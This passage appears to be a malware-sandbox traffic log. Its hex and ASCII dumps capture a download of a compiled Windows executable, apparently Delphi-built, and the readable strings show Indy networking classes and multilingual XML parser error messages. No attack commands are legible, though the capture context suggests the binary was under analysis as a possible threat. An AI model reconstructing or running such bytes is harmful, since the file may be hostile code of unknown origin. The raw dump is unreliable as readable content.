                  2022-06-23 21:14:28 UTC336INData Raw: 89 45 dc 8d 45 a0 50 8b 03 8b 40 60 33 c9 ba 30 b0 00 00 e8 7d 0d fe ff 85 c0 0f 94 45 e3 80 7d e3 00 74 24 8b 03 66 83 b8 32 01 00 00 00 74 18 8d 45 a0 50 8d 4d e3 8d 55 d8 8b 33 8b 86 34 01 00 00 ff 96 30 01 00 00 80 7d e3 00 74 08 8b 03 83 78 60 00 75 04 33 c0 eb 02 b0 01 8b 13 88 42 58 8b 03 80 78 58 00 0f 84 1f 01 00 00 83 7d d8 00 0f 84 15 01 00 00 55 8b 45 a4 e8 c1 fc ff ff 59 8b 03 8b 40 60 8a 50 5f 8b 03 8b 80 84 00 00 00 8b 08 ff 51 70 8b 45 dc 50 8d 45 90 50 8b 03 8b 80 84 00 00 00 8b 4d d8 8b 55 b0 8b 30 ff 96 d8 00 00 00 8b 45 ac 50 8b 45 a8 50 8d 45 90 50 e8 a0 26 fb ff 8b 03 8b 80 84 00 00 00 66 be c8 ff e8 b3 e9 fa ff 84 c0 74 13 55 8b 45 d8 e8 be fc ff ff 59 83 c0 05 29 45 90 29 45 98 8d 8d 78 ff ff ff 8d 55 b8 8b 03 8b 40 60 e8 41 f6 fd
                  Data Ascii: EEP@`30}E}t$f2tEPMU340}tx`u3BXxX}UEY@`P_QpEPEPMU0EPEPEP&ftUEY)E)ExU@`A
                  2022-06-23 21:14:28 UTC352INData Raw: 90 53 56 8b f2 8b d8 8b cb b2 01 a1 28 68 45 00 e8 18 14 00 00 8b d0 85 d2 74 03 83 ea f0 8b c6 e8 40 d4 fa ff 5e 5b c3 90 55 8b ec 6a 00 6a 00 53 56 8b f2 8b d8 33 c0 55 68 a7 8b 45 00 64 ff 30 64 89 20 85 db 75 21 8d 55 fc a1 dc 42 4d 00 e8 d8 d8 fa ff 8b 4d fc b2 01 a1 a4 d7 45 00 e8 0d 36 fb ff e8 5c b0 fa ff 8d 45 f8 8b d3 b9 b4 8b 45 00 e8 19 d4 fa ff 8b 45 f8 8b d6 8b 08 ff 51 0c 33 c0 5a 59 59 64 89 10 68 ae 8b 45 00 8d 45 f8 e8 b6 d3 fa ff 8d 45 fc e8 06 b6 fa ff c3 e9 24 af fa ff eb e8 5e 5b 59 59 5d c3 a1 da f5 5e 29 27 d4 11 83 da 00 c0 4f 60 b2 dd 55 8b ec 6a 00 6a 00 53 56 8b f1 8b da 33 c0 55 68 47 8c 45 00 64 ff 30 64 89 20 8b c3 8b 15 3c 51 45 00 e8 34 a9 fa ff 84 c0 74 18 8b c3 8b 15 3c 51 45 00 e8 47 a9 fa ff 8b 50 14 8d 45 fc e8 3c b6
                  Data Ascii: SV(hEt@^[UjjSV3UhEd0d u!UBMME6\EEEQ3ZYYdhEEE$^[YY]^)'O`UjjSV3UhGEd0d <QE4t<QEGPE<
                  2022-06-23 21:14:28 UTC368INData Raw: 94 fa ff 8b c3 5f 5e 5b 59 59 5d c2 08 00 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 c0 89 45 f8 8b 5d 08 53 33 c0 55 68 71 cb 45 00 64 ff 30 64 89 20 8d 45 fc 50 8d 55 f8 8b c3 e8 0a f2 ff ff 8b 45 f8 50 8b 00 ff 90 14 01 00 00 e8 0d 95 fa ff 66 83 7d fc 01 1b c0 40 8b 55 0c 88 02 33 c0 5a 59 59 64 89 10 58 33 db eb 05 e9 92 6f fa ff 8d 45 f8 e8 d6 93 fa ff 8b c3 5f 5e 5b 59 59 5d c2 08 00 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 c0 89 45 f8 8b 5d 08 53 33 c0 55 68 e5 cb 45 00 64 ff 30 64 89 20 8d 45 fc 50 8d 55 f8 8b c3 e8 96 f1 ff ff 8b 45 f8 50 8b 00 ff 90 0c 01 00 00 e8 99 94 fa ff 66 83 7d fc 01 1b c0 40 8b 55 0c 88 02 33 c0 5a 59 59 64 89 10 58 33 db eb 05 e9 1e 6f fa ff 8d 45 f8 e8 62 93 fa ff 8b c3 5f 5e 5b 59 59 5d c2 08 00 8d 40 00 55 8b ec 6a 00 53
                  Data Ascii: _^[YY]@USVW3E]S3UhqEd0d EPUEPf}@U3ZYYdX3oE_^[YY]@USVW3E]S3UhEd0d EPUEPf}@U3ZYYdX3oEb_^[YY]@UjS
                  2022-06-23 21:14:28 UTC384INData Raw: ff e9 c2 00 00 00 8d 45 f4 ba 2c 0c 46 00 e8 2a 37 fa ff 8d 45 f8 8b 55 f4 e8 1f 37 fa ff 8b 45 f4 e8 3f 39 fa ff 8b f8 4f 8d 4d d4 0f bf d7 b0 30 e8 1f 3d fa ff 8b 55 d4 8d 45 f4 e8 2c 39 fa ff 8b 55 fc 8b 45 f4 e8 2d ef ff ff 85 c0 7d 0d 8d 45 f4 ba 1c 0c 46 00 e8 10 39 fa ff 8b c3 e8 41 36 fa ff eb 2c 8d 45 d0 50 8d 4d f8 8b 55 fc 8b 45 f4 e8 b9 fb ff ff 8b 55 d0 8b c3 e8 eb 38 fa ff 8d 45 f4 b9 1c 0c 46 00 8b 55 f8 e8 1f 39 fa ff 8b 45 f8 ba 1c 0c 46 00 e8 12 3a fa ff 74 11 8b 03 e8 bd 38 fa ff 0f bf d7 83 c2 40 3b c2 7c b4 8d 4d cc 8b 03 8b d6 e8 33 fc ff ff 8b 55 cc 8b c3 e8 31 36 fa ff 33 c0 5a 59 59 64 89 10 68 fe 0b 46 00 8d 45 cc ba 09 00 00 00 e8 e7 35 fa ff 8d 45 f4 ba 03 00 00 00 e8 da 35 fa ff c3 e9 d4 2e fa ff eb de 5f 5e 5b 8b e5 5d c3 00
                  Data Ascii: E,F*7EU7E?9OM0=UE,9UE-}EF9A6,EPMUEU8EFU9EF:t8@;|M3U163ZYYdhFE5E5._^[]
                  2022-06-23 21:14:28 UTC400INData Raw: fc 8b c3 8b 18 ff 93 80 00 00 00 33 c0 5a 59 59 64 89 10 68 2f 4b 46 00 8d 45 fc e8 85 f6 f9 ff c3 e9 a3 ef f9 ff eb f0 8b 45 f8 5b 59 59 5d c3 90 55 8b ec 33 c0 55 68 5d 4b 46 00 64 ff 30 64 89 20 ff 05 3c 5e 4d 00 33 c0 5a 59 59 64 89 10 68 64 4b 46 00 c3 e9 6e ef f9 ff eb f8 5d c3 8b c0 83 2d 3c 5e 4d 00 01 c3 bc 4b 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 4b 46 00 08 01 00 00 44 43 46 00 c4 35 40 00 d0 35 40 00 d4 35 40 00 d8 35 40 00 cc 35 40 00 24 33 40 00 40 33 40 00 7c 33 40 00 c8 5a 46 00 60 5a 46 00 30 5b 46 00 c4 5a 46 00 14 54 49 64 53 6f 63 6b 65 74 4c 69 73 74 57 69 6e 64 6f 77 73 8d 40 00 30 4c 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 4c
                  Data Ascii: 3ZYYdh/KFEE[YY]U3Uh]KFd0d <^M3ZYYdhdKFn]-<^MKFKFDCF5@5@5@5@5@$3@@3@|3@ZF`ZF0[FZFTIdSocketListWindows@0LFL
                  2022-06-23 21:14:28 UTC416INData Raw: 74 65 5f 45 6e 75 6d 65 72 61 74 69 6f 6e 5f 54 6f 6b 65 6e 5f 45 72 72 90 6c 8b 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 8b 46 00 0c 00 00 00 84 73 46 00 c4 35 40 00 d0 35 40 00 d4 35 40 00 d8 35 40 00 cc 35 40 00 24 33 40 00 40 33 40 00 7c 33 40 00 22 45 50 61 72 73 65 72 41 74 74 72 69 62 75 74 65 5f 54 79 70 65 5f 4d 69 73 6d 61 74 63 68 5f 45 72 72 90 dc 8b 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 8b 46 00 0c 00 00 00 84 73 46 00 c4 35 40 00 d0 35 40 00 d4 35 40 00 d8 35 40 00 cc 35 40 00 24 33 40 00 40 33 40 00 7c 33 40 00 1b 45 50 61 72 73 65 72 44 75 70 6c 69 63 61 74 65 5f 54 6f 6b 65 6e 73 5f 45 72 72 44 8c 46 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: te_Enumeration_Token_ErrlFlFsF5@5@5@5@5@$3@@3@|3@"EParserAttribute_Type_Mismatch_ErrFFsF5@5@5@5@5@$3@@3@|3@EParserDuplicate_Tokens_ErrDF
                  2022-06-23 21:14:28 UTC432INData Raw: 00 24 4b 48 00 fc 4c 48 00 0c 4d 48 00 7c 4d 48 00 cc c6 48 00 1c c6 48 00 1e 54 64 6f 6d 43 4d 50 61 72 61 6d 65 74 65 72 45 6e 74 69 74 79 52 65 66 65 72 65 6e 63 65 90 8c cb 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 cb 46 00 28 00 00 00 84 b2 46 00 c4 35 40 00 d0 35 40 00 d4 35 40 00 d8 35 40 00 cc 35 40 00 24 33 40 00 40 33 40 00 bc 42 48 00 80 43 48 00 c8 43 48 00 dc 43 48 00 10 c8 48 00 48 44 48 00 4c 44 48 00 30 45 48 00 34 45 48 00 50 45 48 00 6c 45 48 00 a8 45 48 00 50 44 48 00 54 44 48 00 2c 45 48 00 f4 44 48 00 f4 42 48 00 e4 45 48 00 30 48 48 00 44 4a 48 00 24 4b 48 00 fc 4c 48 00 0c 4d 48 00 7c 4d 48 00 b4 44 48 00 a0 c7 48 00 0e 54 64 6f 6d 43 4d 46 72 61 67 6d 65 6e 74 90 4c cc 46 00 00 00
                  Data Ascii: $KHLHMH|MHHHTdomCMParameterEntityReferenceFF(F5@5@5@5@5@$3@@3@BHCHCHCHHHDHLDH0EH4EHPEHlEHEHPDHTDH,EHDHBHEH0HHDJH$KHLHMH|MHDHHTdomCMFragmentLF
                  2022-06-23 21:14:28 UTC448INData Raw: e8 3c 3f f9 ff 3b d8 7e e2 8b 45 fc e8 30 3f f9 ff 3b d8 7c 08 c6 06 01 e9 10 01 00 00 8d 45 ec 50 8b 45 fc e8 18 3f f9 ff 8b c8 2b cb 41 8b d3 8b 45 fc e8 a5 40 f9 ff 8d 45 fc 8b 55 ec e8 ce 3d f9 ff 8b 45 fc 66 8b 00 66 3b 45 f2 74 0e 66 3b 45 f0 74 08 c6 06 01 e9 d0 00 00 00 66 89 07 8d 45 ec 50 8b 45 fc e8 d5 3e f9 ff 8b c8 49 ba 02 00 00 00 8b 45 fc e8 61 40 f9 ff 8d 45 fc 8b 55 ec e8 8a 3d f9 ff 8d 45 e8 66 8b 17 e8 37 3e f9 ff 8b 45 e8 8b 55 fc e8 1c 41 f9 ff 8b d8 85 db 75 08 c6 06 01 e9 82 00 00 00 8b 45 fc e8 8e 3e f9 ff 3b d8 7d 1a 8b 45 fc 66 8b 04 58 e8 6e 06 00 00 84 c0 75 0a 66 c7 07 00 00 c6 06 01 eb 5c 8b 45 f8 50 8b cb 49 ba 01 00 00 00 8b 45 fc e8 f8 3f f9 ff 43 eb 12 8b 45 fc 66 8b 44 58 fe e8 3c 06 00 00 84 c0 74 0d 43 8b 45 fc e8 3f
                  Data Ascii: <?;~E0?;|EPE?+AE@EU=Eff;Etf;EtfEPE>IEa@EU=Ef7>EUAuE>;}EfXnuf\EPIE?CEfDX<tCE?
                  2022-06-23 21:14:28 UTC464INData Raw: 4c 47 00 21 4c 47 00 66 b8 1d 20 c3 66 b8 1e 20 c3 66 b8 d8 00 c3 66 b8 56 01 c3 66 b8 c6 00 c3 66 b8 1c 20 c3 66 b8 f8 00 c3 66 b8 57 01 c3 66 b8 e6 00 c3 66 b8 04 01 c3 66 b8 2e 01 c3 66 b8 00 01 c3 66 b8 06 01 c3 66 b8 18 01 c3 66 b8 12 01 c3 66 b8 0c 01 c3 66 b8 79 01 c3 66 b8 16 01 c3 66 b8 22 01 c3 66 b8 36 01 c3 66 b8 2a 01 c3 66 b8 3b 01 c3 66 b8 60 01 c3 66 b8 43 01 c3 66 b8 45 01 c3 66 b8 4c 01 c3 66 b8 72 01 c3 66 b8 41 01 c3 66 b8 5a 01 c3 66 b8 6a 01 c3 66 b8 7b 01 c3 66 b8 7d 01 c3 66 b8 05 01 c3 66 b8 2f 01 c3 66 b8 01 01 c3 66 b8 07 01 c3 66 b8 19 01 c3 66 b8 13 01 c3 66 b8 0d 01 c3 66 b8 7a 01 c3 66 b8 17 01 c3 66 b8 23 01 c3 66 b8 37 01 c3 66 b8 2b 01 c3 66 b8 3c 01 c3 66 b8 61 01 c3 66 b8 44 01 c3 66 b8 46 01 c3 66 b8 4d 01 c3 66 b8 73
                  Data Ascii: LG!LGf f ffVff ffWfff.ffffffyff"f6f*f;f`fCfEfLfrfAfZfjf{f}ff/ffffffzff#f7f+f<fafDfFfMfs
                  2022-06-23 21:14:28 UTC480INData Raw: ff 5e 5b c3 90 55 8b ec 53 56 57 84 d2 74 08 83 c4 f0 e8 82 ab f8 ff 8b f1 8b da 8b f8 33 c9 33 d2 8b c7 e8 65 ff ff ff 8d 47 08 8b d6 e8 bb bd f8 ff 8b 45 08 89 47 0c 8b c7 84 db 74 0f e8 ae ab f8 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c7 5f 5e 5b 5d c2 04 00 8d 40 00 55 8b ec 83 c4 f0 53 56 33 d2 89 55 f0 89 55 f4 89 45 fc 33 c0 55 68 72 8c 47 00 64 ff 30 64 89 20 33 c0 89 45 f8 8b 45 fc 8b 40 0c 85 c0 0f 84 c3 00 00 00 33 f6 8b d8 8b c3 8b 10 ff 52 24 3c 01 75 2f 8d 55 f4 8b c3 8b 08 ff 51 18 8b 45 f4 8b 55 fc 8b 52 08 e8 a5 bf f8 ff 74 12 8b 45 fc 8b 40 08 ba 88 8c 47 00 e8 93 bf f8 ff 75 03 ff 45 f8 8b c3 8b 10 ff 92 94 00 00 00 84 c0 74 0a 8b c3 8b 10 ff 52 34 46 eb 1f 8b c3 8b 10 ff 52 40 eb 16 4e 83 fe 01 7c 14 8b c3 8b 10 ff 52 2c 8b d8 8b c3 8b 10
                  Data Ascii: ^[USVWt33eGEGtd_^[]@USV3UUE3UhrGd0d 3EE@3R$<u/UQEURtE@GuEtR4FR@N|R,
                  2022-06-23 21:14:28 UTC496INData Raw: 45 d8 e8 7e 68 f8 ff c3 e9 bc 6f f8 ff eb f0 8b 45 fc 8b 10 ff 52 44 83 78 48 00 0f 84 bd 03 00 00 8b 45 fc 8b 10 ff 92 c8 00 00 00 85 c0 0f 84 aa 03 00 00 8d 55 c4 8b 45 fc 8b 08 ff 51 18 8b 45 c4 50 8b 45 fc 8b 10 ff 92 c8 00 00 00 8d 55 c0 8b 08 ff 51 18 8b 45 c0 50 8b 45 fc 8b 10 ff 52 44 8b 40 48 8b 40 34 5a 59 8b 18 ff 53 08 8b d8 85 db 75 5a c6 45 f7 00 b9 14 d0 47 00 b2 01 a1 c0 8f 46 00 e8 e7 f5 f8 ff 89 45 dc 33 c0 55 68 cf cb 47 00 64 ff 30 64 89 20 83 7d f8 00 74 11 8b 45 dc 50 6a 00 33 c9 33 d2 8b 45 f8 8b 18 ff 13 33 c0 5a 59 59 64 89 10 68 3f cf 47 00 8b 45 dc e8 be 67 f8 ff c3 e9 fc 6e f8 ff eb f0 8d 45 e4 8b 53 2c e8 37 7d f8 ff c6 45 ee 00 8b 45 e4 33 d2 e8 71 7f f8 ff 75 5b c6 45 ef 00 8b c3 8b 10 ff 52 18 8b 10 ff 12 8b f0 4e 85 f6 7c
                  Data Ascii: E~hoERDxHEUEQEPEUQEPERD@H@4ZYSuZEGFE3UhGd0d }tEPj33E3ZYYdh?GEgnES,7}EE3qu[ERN|
                  2022-06-23 21:14:28 UTC512INData Raw: 80 7d ff 00 74 0f e8 e6 2b f8 ff 64 8f 05 00 00 00 00 83 c4 0c 8b c3 5f 5e 5b 59 5d c2 04 00 00 00 ff ff ff ff 18 00 00 00 49 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 20 65 72 72 6f 72 2e 00 00 00 00 ba 09 00 00 55 8b ec 6a 00 53 56 8b d8 33 c0 55 68 a6 0b 48 00 64 ff 30 64 89 20 8b c3 8b 10 ff 52 44 8b 70 48 85 f6 74 19 8d 55 fc 8b c3 8b 08 ff 51 18 8b 55 fc 8b 46 40 8b 08 ff 51 08 8b d8 eb 02 33 db 33 c0 5a 59 59 64 89 10 68 ad 0b 48 00 8d 45 fc e8 13 3d f8 ff c3 e9 25 2f f8 ff eb f0 8b c3 5e 5b 59 5d c3 55 8b ec 33 c9 51 51 51 51 51 53 8b d8 33 c0 55 68 6d 0c 48 00 64 ff 30 64 89 20 8d 55 fc 8b c3 8b 08 ff 51 18 8b 45 fc ba 80 0c 48 00 e8 7a 3f f8 ff 74 64 8d 55 f8 8b c3 8b 08 ff 51 18 8b 45 f8 ba 8c 0c 48 00 e8 61 3f f8 ff 74 4b 8d 55 f4 8b c3
                  Data Ascii: }t+d_^[Y]Invalid character error.UjSV3UhHd0d RDpHtUQUF@Q33ZYYdhHE=%/^[Y]U3QQQQQS3UhmHd0d UQEHz?tdUQEHa?tKU
                  2022-06-23 21:14:28 UTC528INData Raw: ff 15 00 00 00 4e 6f 64 65 20 6e 6f 74 20 66 6f 75 6e 64 20 65 72 72 6f 72 2e 00 00 00 53 56 57 8b da 8b f0 85 db 75 16 b9 78 4c 48 00 b2 01 a1 88 6e 46 00 e8 38 76 f8 ff e8 87 f0 f7 ff 8b c3 8b 10 ff 52 10 3c 1f 77 07 83 e0 7f 0f a3 46 21 72 16 b9 98 4c 48 00 b2 01 a1 98 6c 46 00 e8 0e 76 f8 ff e8 5d f0 f7 ff 8b c6 8b 10 ff 52 2c 8b f8 8b c3 8b 10 ff 52 2c 3b f8 74 16 b9 bc 4c 48 00 b2 01 a1 fc 6c 46 00 e8 e4 75 f8 ff e8 33 f0 f7 ff 8b d3 8b c6 8b 08 ff 51 58 84 c0 75 04 3b f3 75 16 b9 98 4c 48 00 b2 01 a1 98 6c 46 00 e8 bd 75 f8 ff e8 0c f0 f7 ff 80 7e 20 00 74 16 b9 dc 4c 48 00 b2 01 a1 c0 6d 46 00 e8 a1 75 f8 ff e8 f0 ef f7 ff 8b c3 8b 10 ff 52 14 85 c0 74 23 8b c3 8b 10 ff 52 14 80 78 20 00 74 16 b9 dc 4c 48 00 b2 01 a1 c0 6d 46 00 e8 73 75 f8 ff e8
                  Data Ascii: Node not found error.SVWuxLHnF8vR<wF!rLHlFv]R,R,;tLHlFu3QXu;uLHlFu~ tLHmFuRt#Rx tLHmFsu
                  2022-06-23 21:14:28 UTC544INData Raw: f7 ff 85 c0 74 0f 8b 45 f8 ba d0 8b 48 00 e8 46 c0 f7 ff 75 6b 8d 55 f4 8b c6 8b 08 ff 51 08 8d 45 d4 66 8b 15 28 38 4d 00 e8 9b be f7 ff 8b 45 d4 8b 55 f4 e8 80 c1 f7 ff 85 c0 7e 09 66 8b 35 24 38 4d 00 eb 07 66 8b 35 28 38 4d 00 66 c7 45 d0 09 00 66 89 75 d2 8d 55 d0 b9 01 00 00 00 8b c3 e8 4f db fe ff 8b 55 f4 8b c3 e8 25 db fe ff 66 89 75 e8 8d 55 e8 33 c9 8b c3 e8 35 db fe ff 33 c0 5a 59 59 64 89 10 68 c6 8b 48 00 8d 45 d4 e8 1c bd f7 ff 8d 45 e0 ba 02 00 00 00 e8 27 bd f7 ff 8d 45 ec e8 07 bd f7 ff 8d 45 f4 ba 02 00 00 00 e8 12 bd f7 ff c3 e9 0c af f7 ff eb ce 5e 5b 8b e5 5d c3 0c 00 00 00 23 00 46 00 49 00 58 00 45 00 44 00 00 00 00 00 55 8b ec 51 53 56 57 84 d2 74 08 83 c4 f0 e8 ad aa f7 ff 8b f9 88 55 ff 8b d8 8b 75 08 8b c6 33 d2 e8 5a bf f7 ff
                  Data Ascii: tEHFukUQEf(8MEU~f5$8Mf5(8MfEfuUOU%fuU353ZYYdhHEE'EE^[]#FIXEDUQSVWtUu3Z
                  2022-06-23 21:14:28 UTC560INData Raw: e8 ac 7d f7 ff 8d 45 e0 8b 55 e8 e8 1d 79 f7 ff 8b 45 e0 ba a4 d0 48 00 e8 a8 bc f7 ff 85 c0 74 1c 8d 45 dc 8b 55 e8 e8 01 79 f7 ff 8b 45 dc ba b8 d0 48 00 e8 8c bc f7 ff 85 c0 75 09 c6 45 fb 03 e9 47 04 00 00 8d 45 d8 8b 55 e8 e8 dc 78 f7 ff 8b 45 d8 ba c8 d0 48 00 e8 67 bc f7 ff 85 c0 74 1c 8d 45 d4 8b 55 e8 e8 c0 78 f7 ff 8b 45 d4 ba dc d0 48 00 e8 4b bc f7 ff 85 c0 75 09 c6 45 fb 04 e9 06 04 00 00 8d 45 d0 8b 55 e8 e8 9b 78 f7 ff 8b 45 d0 ba ec d0 48 00 e8 26 bc f7 ff 85 c0 74 1c 8d 45 cc 8b 55 e8 e8 7f 78 f7 ff 8b 45 cc ba 00 d1 48 00 e8 0a bc f7 ff 85 c0 75 09 c6 45 fb 05 e9 c5 03 00 00 8d 45 c8 8b 55 e8 e8 5a 78 f7 ff 8b 45 c8 ba 10 d1 48 00 e8 e5 bb f7 ff 85 c0 74 1c 8d 45 c4 8b 55 e8 e8 3e 78 f7 ff 8b 45 c4 ba 24 d1 48 00 e8 c9 bb f7 ff 85 c0 75
                  Data Ascii: }EUyEHtEUyEHuEGEUxEHgtEUxEHKuEEUxEH&tEUxEHuEEUZxEHtEU>xE$Hu
                  2022-06-23 21:14:28 UTC576INData Raw: ff 73 18 68 0c 17 49 00 ff 73 24 68 18 17 49 00 8d 45 e4 ba 05 00 00 00 e8 f4 3f f7 ff 8b 55 e4 8d 45 f8 e8 05 39 f7 ff 8b 43 0c 85 c0 75 0d 8d 45 f4 e8 6e 36 f7 ff e9 92 00 00 00 8b 53 20 3b c2 75 57 8b 53 08 8b 7b 1c 3b d7 75 22 6a 01 89 45 d4 c6 45 d8 00 89 55 dc c6 45 e0 00 8d 4d d4 8d 45 f4 ba 28 17 49 00 e8 a4 8c f7 ff eb 5f 6a 02 89 45 bc c6 45 c0 00 89 7d c4 c6 45 c8 00 89 55 cc c6 45 d0 00 8d 45 bc 50 8d 45 f4 ba 48 17 49 00 59 e8 79 8c f7 ff eb 34 6a 03 89 55 9c c6 45 a0 00 8b 53 1c 89 55 a4 c6 45 a8 00 89 45 ac c6 45 b0 00 8b 43 08 89 45 b4 c6 45 b8 00 8d 4d 9c 8d 45 f4 ba 78 17 49 00 e8 43 8c f7 ff 8b 43 10 ba b8 17 49 00 e8 d6 39 f7 ff 75 12 8d 45 f0 ba e0 17 49 00 e8 53 36 f7 ff e9 ee 09 00 00 8b 43 10 ba 00 18 49 00 e8 b5 39 f7 ff 75 12 8d
                  Data Ascii: shIs$hIE?UE9CuEn6S ;uWS{;u"jEEUEME(I_jEE}EUEEPEHIYy4jUESUEEECEEMExICCI9uEIS6CI9u
                  2022-06-23 21:14:28 UTC592INData Raw: 73 70 61 63 65 55 52 49 4e 6f 74 46 6f 75 6e 64 5f 45 72 72 00 ff ff ff ff 24 00 00 00 45 50 61 72 73 65 72 57 72 6f 6e 67 50 72 65 66 69 78 4d 61 70 70 69 6e 67 4e 65 73 74 69 6e 67 5f 45 72 72 00 00 00 00 ff ff ff ff 1c 00 00 00 45 50 61 72 73 65 72 44 6f 75 62 6c 65 5f 41 74 74 44 65 66 5f 57 61 72 6e 69 6e 67 00 00 00 00 ff ff ff ff 21 00 00 00 45 50 61 72 73 65 72 44 6f 75 62 6c 65 5f 45 6e 74 69 74 79 5f 44 65 63 6c 5f 57 61 72 6e 69 6e 67 00 00 00 ff ff ff ff 1b 00 00 00 44 6f 75 62 6c 65 20 64 e9 63 6c 61 72 61 74 69 6f 6e 20 64 27 65 6e 74 69 74 e9 00 ff ff ff ff 2b 00 00 00 45 50 61 72 73 65 72 44 6f 75 62 6c 65 5f 50 61 72 61 6d 65 74 65 72 5f 45 6e 74 69 74 79 5f 44 65 63 6c 5f 57 61 72 6e 69 6e 67 00 ff ff ff ff 25 00 00 00 44 6f 75 62 6c 65
                  Data Ascii: spaceURINotFound_Err$EParserWrongPrefixMappingNesting_ErrEParserDouble_AttDef_Warning!EParserDouble_Entity_Decl_WarningDouble dclaration d'entit+EParserDouble_Parameter_Entity_Decl_Warning%Double
                  2022-06-23 21:14:28 UTC608INData Raw: 00 ff ff ff ff 17 00 00 00 45 50 61 72 73 65 72 52 6f 6f 74 4e 6f 74 46 6f 75 6e 64 5f 45 72 72 00 ff ff ff ff 1b 00 00 00 45 6c 65 6d 65 6e 74 6f 20 72 61 64 69 63 65 20 6e 6f 6e 20 74 72 6f 76 61 74 6f 00 ff ff ff ff 18 00 00 00 45 50 61 72 73 65 72 44 6f 75 62 6c 65 44 6f 63 74 79 70 65 5f 45 72 72 00 00 00 00 ff ff ff ff 33 00 00 00 44 69 63 68 69 61 72 61 7a 69 6f 6e 65 20 64 65 6c 20 74 69 70 6f 20 64 69 20 64 6f 63 75 6d 65 6e 74 6f 20 28 44 54 44 29 20 64 75 70 6c 69 63 61 74 61 00 ff ff ff ff 1f 00 00 00 45 50 61 72 73 65 72 49 6e 76 61 6c 69 64 41 74 74 72 69 62 75 74 65 4e 61 6d 65 5f 45 72 72 00 ff ff ff ff 19 00 00 00 4e 6f 6d 65 20 61 74 74 72 69 62 75 74 6f 20 6e 6f 6e 20 76 61 6c 69 64 6f 00 00 00 ff ff ff ff 20 00 00 00 45 50 61 72 73 65
                  Data Ascii: EParserRootNotFound_ErrElemento radice non trovatoEParserDoubleDoctype_Err3Dichiarazione del tipo di documento (DTD) duplicataEParserInvalidAttributeName_ErrNome attributo non valido EParse
                  2022-06-23 21:14:28 UTC624INData Raw: 65 6e 63 6a 69 2c 20 6b 74 f3 72 61 20 6e 69 65 20 69 73 74 6e 69 65 6a 65 00 00 00 00 ff ff ff ff 31 00 00 00 45 50 61 72 73 65 72 57 72 6f 6e 67 5f 44 65 63 6c 61 72 61 74 69 6f 6e 5f 4f 66 5f 50 72 65 64 65 66 69 6e 65 64 5f 45 6e 74 69 74 79 5f 45 72 72 00 00 00 ff ff ff ff 2c 00 00 00 4e 69 65 77 b3 61 9c 63 69 77 61 20 64 65 6b 6c 61 72 61 63 6a 61 20 70 72 65 64 65 66 69 6e 69 6f 77 61 6e 65 6a 20 65 6e 63 6a 69 00 00 00 00 ff ff ff ff 28 00 00 00 45 50 61 72 73 65 72 55 6e 72 65 73 6f 6c 76 61 62 6c 65 5f 45 6e 74 69 74 79 5f 52 65 66 65 72 65 6e 63 65 5f 45 72 72 00 00 00 00 ff ff ff ff 24 00 00 00 4e 69 65 72 6f 7a 77 69 b9 7a 79 77 61 6c 6e 61 20 72 65 66 65 72 65 6e 63 6a 61 20 64 6f 20 65 6e 63 6a 69 00 00 00 00 ff ff ff ff 32 00 00 00 45 50
                  Data Ascii: encji, ktra nie istnieje1EParserWrong_Declaration_Of_Predefined_Entity_Err,Niewaciwa deklaracja predefiniowanej encji(EParserUnresolvable_Entity_Reference_Err$Nierozwizywalna referencja do encji2EP
                  2022-06-23 21:14:28 UTC640INData Raw: f2 8b d8 66 83 bb f2 00 00 00 00 74 10 8b cf 8b d6 8b 83 f4 00 00 00 ff 93 f0 00 00 00 83 bb 30 01 00 00 00 74 17 8b cf 8b d6 8b 83 30 01 00 00 8b 38 ff 97 94 00 00 00 89 04 24 eb 05 33 c0 89 04 24 8b cc 8b d6 8b c3 8b 18 ff 53 30 8b 04 24 5a 5f 5e 5b c3 55 8b ec 83 c4 f8 53 56 57 89 4d fc 8b f2 8b d8 8d 45 18 e8 e0 41 f6 ff 8d 45 14 e8 d8 41 f6 ff 8d 45 10 e8 d0 41 f6 ff 8d 45 0c e8 c8 41 f6 ff 8d 45 08 e8 c0 41 f6 ff 33 c0 55 68 32 0c 4a 00 64 ff 30 64 89 20 66 83 bb fa 00 00 00 00 74 25 8d 45 18 50 8d 45 14 50 8d 45 10 50 8d 45 0c 50 8d 45 08 50 8b 4d fc 8b d6 8b 83 fc 00 00 00 ff 93 f8 00 00 00 83 bb 30 01 00 00 00 74 2c 8b 45 18 50 8b 45 14 50 8b 45 10 50 8b 45 0c 50 8b 45 08 50 8b 4d fc 8b d6 8b 83 30 01 00 00 8b 38 ff 97 98 00 00 00 89 45 f8 eb 05
                  Data Ascii: ft0t08$3$S0$Z_^[USVWMEAEAEAEAEA3Uh2Jd0d ft%EPEPEPEPEPM0t,EPEPEPEPEPM08E
                  2022-06-23 21:14:28 UTC656INData Raw: 40 04 83 e8 02 74 0c 83 e8 02 74 1d 83 e8 05 74 2e eb 6a 8b 15 34 39 4d 00 8b 45 d4 8b 08 ff 51 1c 84 c0 74 58 33 db eb 54 8b 15 40 39 4d 00 8b 45 d4 8b 08 ff 51 1c 84 c0 74 42 b3 03 eb 3e 8b 15 44 39 4d 00 8b 45 d4 8b 08 ff 51 1c 84 c0 74 04 b3 04 eb 28 8b 15 48 39 4d 00 8b 45 d4 8b 08 ff 51 1c 84 c0 74 16 b3 06 8d 45 e4 e8 40 fd f5 ff 8d 45 e0 e8 38 fd f5 ff c6 45 dd 00 66 8b 06 66 3b 05 24 39 4d 00 75 13 80 7d de 00 75 0d 8a 45 df 34 01 88 45 df e9 5d 05 00 00 66 8b 06 66 3b 05 28 39 4d 00 75 13 80 7d df 00 75 0d 8a 45 de 34 01 88 45 de e9 3e 05 00 00 66 83 3e 3e 0f 85 34 05 00 00 80 7d de 00 0f 85 2a 05 00 00 80 7d df 00 0f 85 20 05 00 00 ba 02 00 00 00 8b 